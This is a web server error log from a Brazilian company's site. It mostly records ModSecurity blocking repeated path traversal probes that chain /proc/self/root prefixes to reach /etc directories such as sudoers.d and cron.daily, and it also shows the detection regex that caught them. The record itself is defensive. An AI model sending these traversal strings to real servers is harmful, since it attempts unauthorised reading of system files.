[Thu Mar 19 11:11:23.242609 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:43824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwECl_V7PWP6ixUYl6-oAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:11:29.034183 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43410] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:11:32.620768 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:43826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEFMdf6f5d65gmYZR5IQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:11:44.074349 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:57210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEIOyqAr6etmhZHNpi6AAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:11:56.057120 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:12:10.930035 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:52382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEOhkFeYa1D6dYQnDyswAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:12:18.125784 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44618] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:12:39.134679 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:13:01.132307 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45738] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:13:22.137847 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46274] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:13:32.111214 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:45528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEjOyqAr6etmhZHNpjOgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:13:34.480749 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:55474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEjl_V7PWP6ixUYl6-2wAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:13:36.636693 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:55480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEkAkwaGbbGflqUZDEXQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:13:40.759728 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:55484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwElPu8EFLIOrSqIpupIgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:13:46.117818 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:14:09.121793 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47394] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:14:31.363162 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.228.61:60018] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwEx_u8EFLIOrSqIpupMgAAAkE"]
[Thu Mar 19 11:14:32.117202 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:14:56.133820 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48522] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:14:59.351448 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:51658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwE48df6f5d65gmYZR5qQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:07.499462 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:45578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwE6wkwaGbbGflqUZDEtwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:15.537550 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:42560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwE81_V7PWP6ixUYl6_HAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:19.682568 2026] [access_compat:error] [pid 19093:tid 140411574073088] [client 216.73.216.191:30411] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 11:15:27.141289 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49170] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:15:31.583903 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:42966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFAwbLMZ6AikZjR9Vf_wAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:36.175395 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:43006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFCF_V7PWP6ixUYl6_OgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:49.789452 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:43008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFFRkFeYa1D6dYQnDzSgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:51.891473 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:56910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFF_-YZRR_7pZ7nDKOggAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:15:55.147537 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:16:14.267925 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.244.43:41796] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwFLgbLMZ6AikZjR9VgFAAAAAo"]
[Thu Mar 19 11:16:21.065881 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:16:33.663343 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:56924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFQcdf6f5d65gmYZR57AAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:16:42.415201 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:43854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFSsdf6f5d65gmYZR59gAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:16:45.129767 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51014] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:17:08.257819 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:17:23.016162 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:42702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFcwkwaGbbGflqUZDFDAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:17:31.069805 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:17:40.756880 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:34984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFhOoXxyEfFpUF8f8RRQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:17:44.997234 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:55172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFiP-YZRR_7pZ7nDKOvAAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
